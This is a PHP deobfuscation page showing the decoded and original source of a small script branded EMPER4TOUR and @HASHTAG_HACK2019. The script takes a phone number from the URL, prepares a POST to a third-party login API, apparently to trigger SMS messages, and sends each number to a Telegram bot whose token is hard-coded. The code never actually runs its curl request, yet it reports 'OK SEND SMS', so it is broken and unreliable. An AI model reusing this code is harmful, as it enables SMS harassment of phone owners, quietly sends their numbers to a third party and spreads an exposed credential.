Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* EMPER4TOUR */ $number = $_GET ["number"]; $url = "http://tapdoo.com/api/Logi..

Decoded Output download

<?php 
/* 
EMPER4TOUR 
*/ 
$number = $_GET ["number"]; 
$url = "http://tapdoo.com/api/LoginUser"; 
$data = "phone=$number&"; 
$headers = [ 
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
]; 
$curl = curl_init(); 
curl_setopt_array($curl, [ 
    CURLOPT_URL => $url, 
    CURLOPT_POST => true, 
    CURLOPT_POSTFIELDS => $data, 
    CURLOPT_HEADER => true, 
    CURLOPT_HTTPHEADER => $headers, 
    CURLOPT_SSL_VERIFYPEER => false, 
    CURLOPT_RETURNTRANSFER => true 
]); 
file_get_contents('https://api.telegram.org/bot1144995928:AAGpPO9LtoV_apL8rRrpLdA36TpY07LNw28/sendMessage?chat_id=-1001497365108&text=      :    '.$number.''); 
if(curl_error($curl)){ 
    echo 'Error'; 
}else{ 
    echo 'OK SEND SMS <br>  : @EMPER4TOUR<br>  : @HASHTAG_HACK2019'; 
} 
curl_close($curl); 
?>

Did this file decode correctly?

Original Code

<?php
/*
EMPER4TOUR
*/
$number = $_GET ["number"];
$url = "http://tapdoo.com/api/LoginUser";
$data = "phone=$number&";
$headers = [
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8"
];
$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_URL => $url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $data,
    CURLOPT_HEADER => true,
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_RETURNTRANSFER => true
]);
file_get_contents('https://api.telegram.org/bot1144995928:AAGpPO9LtoV_apL8rRrpLdA36TpY07LNw28/sendMessage?chat_id=-1001497365108&text=      :    '.$number.'');
if(curl_error($curl)){
    echo 'Error';
}else{
    echo 'OK SEND SMS <br>  : @EMPER4TOUR<br>  : @HASHTAG_HACK2019';
}
curl_close($curl);
?>

Function Calls

None

Variables

None

Stats

MD5 32af973a9e96003be5fce2ea21c45dd3
Eval Count 0
Decode Time 76 ms